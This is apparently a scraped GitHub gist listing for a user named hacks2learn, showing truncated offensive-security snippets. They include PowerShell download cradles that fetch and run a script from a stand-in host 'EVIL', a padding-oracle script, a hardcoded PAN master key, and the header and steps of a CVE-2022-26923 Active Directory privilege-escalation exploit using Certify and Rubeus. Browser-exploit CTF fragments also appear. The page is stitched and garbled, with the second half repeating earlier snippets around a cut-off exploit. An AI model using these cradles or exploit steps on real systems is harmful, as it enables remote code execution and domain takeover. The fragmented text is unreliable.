Marco hacks2learn

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## Filename extension list
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt

## pan-oracle.py
import paramiko
import sys
import requests

pad=lambda n: '\0'*(n+1)+(chr(16-n)*(16-n-1))
block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
set_pad=lambda x,n: block_xor(pad(n), x)

def formatData(d):

## checkmk.py
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():

## 0-README.md

      
              7 files
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                hacks2learn
                / 0-README.md
            
            
              Created
              June 29, 2022 15:42
                — forked from atoponce/0-README.md
            
              
                Magic Hashes
              
          
    Magic Hashes

Motivations

Calculating magic hashes for https://www.whitehatsec.com/blog/magic-hashes/.
These strings should probably be put into a blacklist preventing users from
using them as passwords to mitigate PHP evaluating hashes starting with "0e" as
floats.
Probabilities


## MutateMethods.py
import time

class TrafficMagnet(burp.IProxyListener):
    def __init__(self, engine):
        callbacks.registerProxyListener(self)
        self._engine = engine
        self._target = str(self._engine.engine.getTarget()).lower().replace("https:","").replace("http:","").replace("/","").split(':')[0]

    def listen(self):
        while True:

## boilerplate.py
#!/usr/bin/env python3


import argparse
import sys
import json

import logging


## Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

// Steps:
// 1.       Escalate on any workstation (hint: krbrelayup ftw)
// 2.       Execute UpdateMachineAccount.exe as SYSTEM
// 3.       Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4.       Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)

## index.html
<html>
  <head>
    <title>google-ctf fullchain</title>
  </head>
  <body>
    <h1>HK</h1>
    <pre id='log'></pre>
  </body>
  <script src='./mojo/mojo_bindings.js'></script>
  <script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>

## corctf_outfoxed.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                hacks2learn
                / corctf_outfoxed.md
            
            
              Created
              April 20, 2022 03:10
                — forked from hkraw/corctf_outfoxed.md
            
              
                first firefox pwn
              
          
    outfoxed exp (First Blood)

let pwn = async function() {
  /* Helpers */
  let conversionBuffer = new ArrayBuffer(0x40)
  let floatView = new Float64Array(conversionBuffer)
  let intView = new BigUint64Array(conversionBuffer)

  BigInt.prototype.i2f = function() {
    intView[0] = this
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	import paramiko
	import sys
	import requests

	pad=lambda n: '\0'(n+1)+(chr(16-n)(16-n-1))
	block_xor=lambda x,y: ''.join(chr(ord(a)^ord(b)) for a,b in zip(x,y))
	byte_xor=lambda x,y,z: x[:y]+chr(ord(x[y])^z)+x[y+1:]
	set_pad=lambda x,n: block_xor(pad(n), x)

	def formatData(d):
	from hashlib import md5, sha1
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend
	from base64 import b64encode, b64decode
	import sys, time
	import requests

	DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

	class PanCrypt():
	import time

	class TrafficMagnet(burp.IProxyListener):
	def __init__(self, engine):
	callbacks.registerProxyListener(self)
	self._engine = engine
	self._target = str(self._engine.engine.getTarget()).lower().replace("https:","").replace("http:","").replace("/","").split(':')[0]

	def listen(self):
	while True:
	#!/usr/bin/env python3


	import argparse
	import sys
	import json

	import logging
	// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
	// Author: @domchell - MDSec
	// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
	// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

	// Steps:
	// 1. Escalate on any workstation (hint: krbrelayup ftw)
	// 2. Execute UpdateMachineAccount.exe as SYSTEM
	// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
	// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
	<html>
	<head>
	<title>google-ctf fullchain</title>
	</head>
	<body>
	<h1>HK</h1>
	<pre id='log'></pre>
	</body>
	<script src='./mojo/mojo_bindings.js'></script>
	<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>